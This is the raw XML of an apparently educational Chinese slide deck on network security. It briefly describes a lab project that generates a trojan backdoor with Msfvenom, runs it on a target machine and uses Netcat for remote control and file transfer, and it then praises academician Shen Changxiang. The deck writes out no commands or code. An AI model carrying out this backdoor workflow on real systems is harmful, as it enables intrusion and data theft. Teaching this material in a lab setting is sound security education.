                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="3300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310532" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1262126" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1352550" y="502526"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1262126" y="502526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310146" y="504029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="508026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352550" y="502526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1142047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11915775" y="49339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1582400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174432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Freeform 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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1915775" y="51816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Freeform 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400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1174432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AutoShape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="54197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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2250" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8381" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17466" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="66675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="64047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="56896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="46315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="33400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54899" y="20413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48768" y="9794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39683" y="262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11582400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1174432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AutoShape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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1915775" y="56673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AutoShape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400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AutoShape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174432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AutoShape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="5876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1582400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174432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AutoShape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="61150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1582400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174432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AutoShape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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Freeform 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11915775" y="63627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582400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74432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AutoShape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142047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11915775" y="66103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AutoShape 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400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AutoShape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174432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11325225" y="1866900"/>
            <a:ext cx="866775" cy="1733550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="866775" h="1733550">
                <a:moveTo>
                  <a:pt x="866775" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="819221" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="5086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="11345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="19993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="30965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="44192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="59611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="77154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="96756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="118349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="141869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="167249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="194423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="223325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="253888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="286047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="319736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="354887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="391436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="429316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="468461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="508804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="550281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="592823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="636367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="680844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="726190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="772337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="819221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="866775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282" y="914328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="961212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="1007359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="1052705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30965" y="1097182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44192" y="1140726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59611" y="1183268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77154" y="1224745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96756" y="1265088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118349" y="1304233"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141869" y="1342113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167249" y="1378662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194423" y="1413813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223325" y="1447502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253888" y="1479661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286047" y="1510224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319736" y="1539126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354887" y="1566300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="391436" y="1591680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429316" y="1615200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="468461" y="1636793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508804" y="1656395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550281" y="1673938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="592823" y="1689357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="636367" y="1702584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680844" y="1713556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726190" y="1722204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="772337" y="1728463"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="819221" y="1732267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="866775" y="1733550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86677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Freeform 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="471927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0" y="1194947"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1146873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="1099280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="1052205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="1005683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="959750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="914442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="869794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="825841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="782621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="740168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="698518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="657707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="617771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="578745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="540665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="503567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="467486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="432458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="398519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="365705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="334051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="303593"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="274366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="246408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="219752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="194435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="170492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="147960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="126874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="107269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="89182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="72648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="57703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="44382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="32722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="22757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="14524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="8059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1099656" y="3396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1147249" y="573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1176274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Freeform 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11015726" y="1666875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1176274" y="1195074"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1099656" y="1191677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1052581" y="1187013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1006059" y="1180546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="960126" y="1172312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914818" y="1162345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870170" y="1150682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="826218" y="1137358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="782997" y="1122410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740544" y="1105873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="1087782"/>
                </a:ln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Freeform 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11063605" y="728980"/>
            <a:ext cx="389255" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="389254" h="439419">
                <a:moveTo>
                  <a:pt x="388747" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373252" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38874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5662676" y="1976501"/>
            <a:ext cx="883919" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="883919" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="883920" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="3C7CB3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7591425" y="257175"/>
            <a:ext cx="3686175" cy="54292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TextBox 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="2895600"/>
            <a:ext cx="3335020" cy="939800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30"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5625">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="540000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谢谢观看</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5625">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:alpha val="100000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="25400" dir="540000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PART02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27547" y="1347605"/>
            <a:ext cx="6414302" cy="84374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木马病毒危害网络安全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27547" y="1994199"/>
            <a:ext cx="6414302" cy="126108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木马程序通过伪装吸引用户下载执行，提供打开被控制主机的后门，使木马提供者可以任意毁坏、窃取目标主机的文件，甚至远程操控主机。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56837" y="3761555"/>
            <a:ext cx="6214706" cy="84374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>
              <a:lnSpc>
                <a:spcPct val="174000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="21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项目实施了解木马原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="21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56837" y="4425262"/>
            <a:ext cx="6486882" cy="1261086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项目通过Msfvenom生成木马后门，拷贝到目标靶机并运行，使得攻击机获取控制权限；利用Netcat实现信息通信、文件传输和远程控制等。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>
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:srcRect l="25043" r="25043"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432633" y="1237527"/>
            <a:ext cx="3505032" cy="4673376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PART03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13715" y="3963035"/>
            <a:ext cx="2955290" cy="2134235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沈昌祥院士以卓越科研和深厚爱国情怀，为国家信息安全做贡献，在密码科技、信息系统工程领域取得突破性进展。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-262066" y="3420120"/>
            <a:ext cx="430530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77000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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沈昌祥院士贡献</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725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607243" y="3361672"/>
            <a:ext cx="430530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77000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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科研成果显著</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725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535188" y="3361672"/>
            <a:ext cx="430530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77000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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敬业精神与使命感</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1725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5247296" y="1658382"/>
            <a:ext cx="1161288" cy="1161288"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="236696">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314515" y="1658382"/>
            <a:ext cx="1161288" cy="1161288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11" name="AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9107715" y="1658382"/>
            <a:ext cx="1161288" cy="1161288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12" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5519756" y="1930842"/>
            <a:ext cx="616369" cy="61636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w="304800" h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w="304800" h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w="304800" h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w="304800" h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w="304800" h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w="304800" h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w="304800" h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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635083" y="1944112"/>
            <a:ext cx="543378" cy="54337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</a:path>
              <a:path w="304800" h="304800"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</a:path>
              <a:path w="304800" h="304800"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</a:path>
              <a:path w="304800" h="304800"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</a:path>
              <a:path w="304800" h="304800"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</a:path>
              <a:path w="304800" h="304800"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Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9410812" y="1961479"/>
            <a:ext cx="555095" cy="5550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</a:path>
              <a:path w="304800" h="304800"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5" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4208780" y="3963035"/>
            <a:ext cx="3329305" cy="1718945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沈昌祥院士在计算机信息系统、信息安全体系等方面取得重大成果，达世界先进水平，提升我国信息安全保密能力。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048625" y="3963035"/>
            <a:ext cx="3724910" cy="1718945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沈昌祥院士的科研生涯体现科学家敬业精神和对国家安全的使命感，近八十仍坚守一线，为实现网络强国梦努力。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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633069" y="2850858"/>
            <a:ext cx="1703794" cy="641191"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4792456" y="2913365"/>
            <a:ext cx="1992128" cy="834758"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5895385" y="3752156"/>
            <a:ext cx="3992321" cy="1687662"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t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</a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2F89C9">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3064467" y="2481872"/>
            <a:ext cx="788383" cy="431493"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3852849" y="3492050"/>
            <a:ext cx="1586846" cy="994048"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7552803" y="3171455"/>
            <a:ext cx="1080749" cy="816611"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="2F89C9">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2467635" y="4486098"/>
            <a:ext cx="1861067" cy="234072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="937847" y="1505973"/>
            <a:ext cx="1990725" cy="314325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科研精神与爱国情怀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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646178" y="3950784"/>
            <a:ext cx="1990725" cy="314325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2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信息安全重要性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2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797525" y="1728251"/>
            <a:ext cx="1990725" cy="314325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l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1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建设网络强国</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1">
              <a:solidFill>
                <a:schemeClr val="accent3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93065" y="1823085"/>
            <a:ext cx="2529840" cy="194183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故事告诉我们，科研工作者应以国家利益为重，以科技创新为己任，学习沈院士精神，为国家发展贡献力量。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48080" y="4344670"/>
            <a:ext cx="2482850" cy="194183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信息时代，信息安全重要性日益凸显，我们要学习沈院士的科研精神和爱国情怀，努力成为信息安全领域的栋梁之才。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8763000" y="2057400"/>
            <a:ext cx="2938145" cy="1572260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="95250" tIns="95250" rIns="47625" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef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我们要学习沈院士的爱国情怀，努力成为信息安全领域的栋梁之才，为建设网络强国贡献青春力量。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#472308"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.DIAGRAM" val="#472308"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ISLIDE.DIAGRAM" val="#472308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F89C9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="2F89C9"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="2F89C9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="2F89C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10046</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>474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Wingdings</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>华文新魏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</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-11T14:13:06Z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EB28F8C28C2F4D0F8B5BDC9564BF8EBC</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.8.2.12265</vt:lpwstr>
  </property>
</Properties>
</file>